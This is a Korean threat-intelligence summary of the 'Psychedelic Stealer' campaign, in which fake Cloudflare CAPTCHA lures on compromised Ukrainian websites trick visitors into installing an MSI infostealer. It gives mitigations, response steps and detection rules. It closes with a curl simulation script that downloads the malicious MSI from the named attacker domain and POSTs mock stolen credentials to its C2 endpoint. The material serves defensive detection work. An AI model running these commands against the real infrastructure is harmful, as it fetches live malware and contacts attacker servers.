사이키델릭 스틸러: CAPTCHA가 설치 프로그램이 될 때
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
Arctic Wolf Labs는 손상된 우크라이나 비즈니스 웹사이트에 주입된 가짜 Cloudflare CAPTCHA 미끼를 사용하는 캠페인을 추적 중입니다. ClickFix 스타일의 공격은 사용자가 Psychedelic Stealer를 설치하는 MSI 패키지를 실행하도록 유도합니다. 이 인포스틸러는 브라우저 자격 증명, 계정 토큰, 암호화폐 지갑 데이터를 수집하도록 설계되었습니다. 이 악성 소프트웨어는 전용 C2 인프라를 통해 지속적인 원격 태스크 수행도 지원합니다.
조사
조사 결과, 합법적인 우크라이나 웹사이트에 주입된 iframe이 방문자를 가짜 인증 흐름으로 리디렉션하는 것으로 밝혀졌습니다. Rublevka TDS라는 브랜드의 미끼 관리 패널도 식별되었으며, 이 패널은 명령 구성을 제어하고 방문자 텔레메트리를 기록합니다. MSI 페이로드에 대한 기술적 분석에서는 자격 증명 및 데이터 절도를 위한 악성 소프트웨어의 핵심 루틴과 함께 암호화된 다음 단계 URL이 밝혀졌습니다.
완화
조직은 웹 브라우저 또는 명령줄 인터페이스에 의해 시작된 Windows Installer (msiexec.exe)의 의심스러운 실행을 모니터링해야 합니다. 웹 필터링은 알려진 악성 도메인을 차단해야 하며, 방어자는 또한 권한 없는 iframe 주입에 대해 합법적인 웹 자산을 모니터링해야 합니다. 예약된 작업 생성에 대한 엔드포인트 제어를 강화하면 지속성 위험을 줄일 수 있습니다.
대응
Psychedelic Stealer 활동이 감지되면 영향을 받은 엔드포인트를 격리하여 추가 데이터 유출 또는 횡적 이동을 막습니다. 브라우저 프로필과 로컬 스토리지를 감사하여 손상된 자격 증명, 인증 토큰 및 지갑 데이터를 점검해야 합니다. 알려진 C2 인프라와의 통신에 대한 네트워크 텔레메트리를 검토하고 시스템을 검사하여 허가되지 않은 예약 작업 또는 의심스러운 네이티브 메시징 호스트를 찾아야 합니다.
공격 흐름
탐지
의심스러운 RunMRU 항목이 LOLBin 의미론과 함께 있음 (레지스트리 이벤트를 통해)
원격 MSI 파일 설치 시도 가능성 (cmdline을 통해)
일반적지 않은 포트를 사용하는 Direct IP로의 HTTP를 오가는 C2 통신 가능성 (프록시를 통해)
의심스러운 파일 다운로드가 Direct IP로 이루어짐 (프록시를 통해)
IOC (HashSha256) 탐지에 대한: The Psychedelic Stealer: CAPTCHA가 설치 프로그램이 될 때
IOC (SourceIP) 탐지에 대한: The Psychedelic Stealer: CAPTCHA가 설치 프로그램이 될 때
IOC (DestinationIP) 탐지에 대한: The Psychedelic Stealer: CAPTCHA가 설치 프로그램이 될 때
Psychedelic Stealer 인프라 접근 탐지 [웹서버]
시뮬레이션 실행
-
공격 내러티브 및 명령어: 적은 가짜 CAPTCHA 메커니즘을 통해 표적을 감염시키려 합니다. 시뮬레이션은 피해자의 브라우저 행동을 모방합니다: 먼저 초기 감사를 피하기 위해 공격자의 랜딩 페이지로 이동한 다음, 악성 MSI 페이로드를 요청하고 마지막으로 공격자의 컨트롤 스크립트로 HTTP POST를 통해 C2 연결을 시작합니다. 이 순서는 Psychedelic Stealer 인프라에서 확인된 URI 패턴을 정확히 모방하도록 설계되었습니다.
-
회귀 테스트 스크립트: 다음 스크립트는
curl를 사용하여 탐지 논리의 세 가지 뚜렷한 단계를 시뮬레이트합니다.#!/bin/bash # Psychedelic Stealer 인프라 접근 시뮬레이션 스크립트 TARGET_DOMAIN="uasputnik.com" echo "[+] Psychedelic Stealer 인프라 시뮬레이션 시작..." # 1단계: 랜딩 페이지 방문 시뮬레이션 (선택 1) echo "[*] 랜딩 페이지에 대한 GET 요청 시뮬레이션 중..." curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null # 2단계: 악성 MSI 다운로드 시뮬레이션 (선택 2) echo "[*] 페이로드에 대한 GET 요청 시뮬레이션 중..." curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null # 3단계: C2 엔드포인트로의 POST 통신 시뮬레이션 (선택 3) echo "[*] C2 엔드포인트로의 POST 요청 시뮬레이션 중..." curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null echo "[+] 시뮬레이션 완료. SIEM에서 경고를 확인하세요." -
정리 명령:
# 네트워크 기반 시뮬레이션이므로 로컬 시스템에 파일이 생성되지 않습니다. # 특별히 요청되지 않는 한 로컬 파일 시스템에는 정리가 필요하지 않습니다. echo "[+] 정리 완료."